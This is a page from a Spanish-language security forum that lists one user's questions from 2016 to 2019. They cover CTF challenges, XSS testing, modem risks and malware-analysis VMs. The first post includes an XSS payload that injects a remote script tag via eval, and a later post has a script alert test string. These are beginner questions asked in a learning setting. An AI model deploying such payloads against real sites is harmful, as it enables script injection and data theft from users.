elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


  Mostrar Temas
Páginas: [1] 2 3 4 5 6
1  Seguridad Informática / Hacking / ¿Explotar javascript? en: 10 Octubre 2019, 07:53 am
Buenas tardes, hacee unos dias entre nuevamente de lleno al tema del hacking, y estoy realizando un par de retos de todo tipo. Ahorita estoy atascado en conseguir una flag.

El punto es el siguiente es un sitio que unicamente tiene un codigo javascript que regresa al mismo sitio.

El javascript es el siguiente

<a href="javascript:openNewWindow('hello.html');">Rompeme</a>


He intentado cambiar el script para intentar sacar un XSS de esta manera

<a href="javascript:eval('var a=document.createElement(\'script\');a.src=\'https://micodigo\';document.body.appendChild(a)')">Rompeme</a>

Al hacerlo obtengo un [object HTMLScriptElement] pero mi sitio no esta capturando nada.

¿Alguien podria darme una mano?


Gracias
Saludos!! ;D

2  Seguridad Informática / Hacking / Ataque XSS? en: 2 Septiembre 2019, 22:12 pm
Hola buenas tardes, estoy probando una plataforma y tengo una duda acerca de XSS, he mandado el Alert y entrega una respuesta 200. pero no me muestra ninguna alerta, la pagina queda en blanco.





Se puede decir que esta url es vulnerable a XSS o realmente no?




Debo admitir que al realizar la alerta tuve un error de dedo y puse mal la función .json y me mostro un error de CakePHP, supongo que esto esta de mas, pero me gustaría saber si puedo explotarlo de alguna manera.





¿Alguna recomendacion?



Gracias
3  Seguridad Informática / Hacking Wireless / Peligros de un Módem vulnerable? en: 2 Enero 2019, 02:32 am
Bueno en mi casa tengo internet por medio de un Módem DSL de Telmex, tengo una contraseña fuerte y no tengo WPS activo, pero es un modelo viejo y al parecer tiene varias vulnerabilidades.

¿Que peligros puede tener esto?

Es posible que desde otro país se pueda acceder a mi Módem y hacerme MITM?

En caso de que alguien accediera al Módem de manera remota que ataque pudieran usar en mis equipos?

Gracias saludos
4  Foros Generales / Dudas Generales / Retos forenses en español? en: 22 Mayo 2017, 02:58 am
Buenas tardes estuve indagando en el apartado de wargames del foro pero no encontre ningun reto forense en español, alguien tendra alguno por ahi para practicar un poco?


Gracias saludos!
5  Programación / Java / Javaweb Reproduce musica en: 12 Mayo 2017, 05:34 am
Buenas tardes, actualmente estoy intentado crear un proyecto en netbeans en java web.

Mi proyecto consiste en dar usuarios y contraseñas ya definidas y que cada usuario tenga la opcion de seleccionar una cancion de una lista y reproducirla y guardar la eleccion de cada usuario. Como podria hacer este proyecto tengo entendido que se tendria que usar manejo de sesiones. Pero alguien me podria dar una ayuda


Gracias
6  Foros Generales / Dudas Generales / Juegos en javascript ¿Seguros? en: 18 Abril 2017, 05:23 am
Hola buenas tardes, me gustaria preguntar e informarme acerca de los juegos online en javascript son juegos seguros? son faciles de modificar?  Que hace que un juego en javascript sea seguro?
7  Seguridad Informática / Criptografía / Es posible Reversear una Secuencia Alfanumerica? en: 5 Abril 2017, 08:18 am
Bueno me gustaría conocer la secuencia de una serie alfanumerica.
Me gustaria  saber si estoy haciendolo correctamente, lo primero que estoy intentando es recopilar información por ejemplo se que los Codigos Alfanumericos son de 10 caracteres,creo que el siguiente paso es conocer el charset pero no se cuantas muestras necesito. Tambien se que son 50,474,440 combinaciones dentro de la secuencia final.

Un Ejemplo de las Muestras


79JHZHZF2N
6LQP3XT3YD
WRVDNWNRKD
KV36TVN57W



¿Que me recomiendan seguir haciendo o que pasos pueden ayudar?


Gracias Saludos
8  Foros Generales / Dudas Generales / ¿En que esta programado un juego web? en: 2 Abril 2017, 20:12 pm
Bueno vi un juego muy interesante en facebook, no soy mucho de juegos de navegador de hecho es el primero que juego despues de muuucho tiempo unos 7 años y me ha sorprendido el rendimiento, pero al parecer como ya se usa html5 en vez del flashplayer creo que ayuda mucho. Mi pregunta es como puedo saber en que esta hecho dicho juego?

Gracias
9  Seguridad Informática / Bugs y Exploits / XSS verified Acunetix? en: 26 Diciembre 2016, 06:33 am
Hola buenas tardes, he estado probando con acunetix en un servidor local, para ver sus vulnerabilidades y al hacerlo acunetix me da aprox 160 Errores potenciales con Cross Site Scripting (Verified) en /.

Despues de probar con el ya clasico <script>alert("XSS")</script> no me da el mensaje que espero, en su lugar me da un error asi

/?module=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E


Es acaso que no es vulnerable ante XSS y es un falso positivo o algo estoy haciendo mal?

Gracias
10  Foros Generales / Dudas Generales / Maquina virtual segura en: 7 Septiembre 2016, 04:21 am
Buenas tardes, de que manera puedo crear una maquina virtual para infectar continuamente con malware para analizar, sin que se vea afectada mi maquina principal.

Ya que una vez me sucedio que al hacer pruebas en la maquina virtual se infecto mi equipo fisico, posiblemente por una mala configuracion.

Gracias
Páginas: [1] 2 3 4 5 6
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines